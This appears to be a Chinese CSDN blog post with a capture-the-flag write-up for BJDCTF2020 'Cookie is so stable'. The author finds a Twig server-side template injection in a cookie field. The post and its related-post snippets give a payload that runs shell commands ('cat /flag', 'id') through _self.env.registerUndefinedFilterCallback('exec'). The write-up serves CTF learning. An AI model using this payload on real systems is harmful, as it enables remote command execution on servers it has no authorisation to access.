[BJDCTF2020]Cookie is so stable

最新推荐文章于 2023-09-19 11:11:09 发布
最新推荐文章于 2023-09-19 11:11:09 发布
阅读量134 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57861415/article/details/130337602
版权

打开就是一个登录id,随便打个admin看看,根据题目提示,再翻翻cookie。打几个单引号和{{7*7}}看看有没有报错或者是ssti。

发现有ssti,于是按照流程确认模版类型。

 得到是Twig模版,然后开始找wp(bushi)。

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

学习文章:

一篇文章带你理解漏洞之 SSTI 漏洞 

[BJDCTF2020]Cookie is so stable

glan想睡觉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 495
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
获取cookie非常好用的google插件
06-10
可以安装到google浏览器,方便快速导出cookie数据
IIS实现反向代理时Cookie域的设置方法
01-03
反向代理 神马是反向代理?指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理...但是在多站点共享cookie时会存在
详解jQuery的Cookie插件
11-26
火狐浏览器提示:$.cookie is not a function;调试了半天,终于找到原因,如果同一个页面两次或者多次引入jQuery插件就会报此错误。  使用方法:  1、引入jQuery与jQuery.Cookie.js插件。 [removed][removed] &...
VUE前端cookie简单操作
12-28
如下是简单cookie操作,当前仅限前端实例,具体内容如下 要注意的有两点: 1、cookie内容存贮的名称 2、删除cookie是通过设置过期为过去时间实现的 <body> <button @click=clearCookie()> 清除...
Buuctf(Cookie is so stable
m0_64444909的博客
04-12 417
1.本题需要了解到服务端模板注入攻击,SSTI里的Twig攻击。 这里大家要想详细了解可以查看这里的两篇博客 智慧门 安全门 测试为Twig还是jinja2模块的方法: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 2.尝试输入以后发现本题为Twig模块 3.Twig模块的payload自己记录下来,下次需要直接复制即可 PS: 先要把exec() 作为回调函数传进去就能实现命令执行了 (1)首先要先查看id,用BP抓包放包即可
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1185
运用的知识点 SSTI注入 题目 解题 一开始看到题目提示cookie 先抓一个包试试 没发现什么问题,点开另一个网页 感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 675
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020] web题-Cookie is so stable
BROTHERYY的博客
12-31 260
酷炫的欢迎界面,有1个flag.php和hint.php hint.php的页面元素发现了提示 去flag.php发现存在模板注入 然后提示说研究cookie,使用payload payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}}; flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55} ...
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2454
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
[BJDCTF2020]Cookie is so stable(ssti模板注入从0到1学习笔记)
姜小孩的博客
03-31 1686
ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu
[BJDCTF2020]Cookie is so stable 模板注入SSTI
m0_64180167的博客
09-19 158
这个题目已经在提示我们了然后我们去hint看看让我们看看cookie 那我们肯定直接抓包啊cookie中存在 回显值 但是我觉得一眼看上去就不是sql注入 因为是我们提交东西 而且没有查询的东西所以我们可以想到是不是其他注入 于是就思考到是不是模板注入。
Uncaught ReferenceError: cookie is not defined
最新发布
01-25
Uncaught ReferenceError: cookie is not defined错误通常是因为在代码中使用了未定义的cookie变量。这可能是由于以下几个原因导致的: 1. 拼写错误:请确保你在代码中正确地拼写了cookie变量。检查是否有任何拼写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值